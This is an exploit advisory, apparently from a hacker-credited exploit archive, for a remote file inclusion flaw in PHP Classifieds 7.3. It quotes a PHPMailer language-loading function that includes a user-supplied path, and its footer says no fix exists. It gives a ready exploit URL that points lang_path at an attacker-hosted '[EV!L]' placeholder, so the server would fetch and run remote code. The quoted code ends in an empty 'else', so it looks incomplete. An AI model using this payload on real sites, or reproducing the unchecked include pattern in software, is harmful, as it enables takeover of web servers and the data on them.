PHP Classifieds 7.3 Remote File Inclusion Vulnerability

2010-09-04 09:15:56

==================================
PHP Classifieds v7.3 RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability
[x] DatE : 09 September 2010
[x] AutH0r : alsa7r
[x] Contact : [email protected]
[x] TestEd 0n : windows 7
[x] d0rK : :P
====================================================

==========================================================================================
[x]bug heRe:
function SetLanguage($lang_type, $lang_path = "tools/phpmailer/language/") {
//echo $lang_path.'phpmailer.lang-'.$lang_type.'.php';
if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php'))
include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
else if(file_exists($lang_path.'phpmailer.lang-en.php'))
include($lang_path.'phpmailer.lang-en.php');
else
}
==========================================================================================

==================================================================
[x]expL0iT:
http://[site]/classifieds/tools/phpmailer/class.phpmailer.php?lang_path=[EV!L]
==================================================================

============================================================================================
[x]th4nKs t0:
Mr.wolf , morabko , unit x team , sudan hacker team
============================================================================================

=====================
TBT9[at]hotmail[dot]com
=====================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.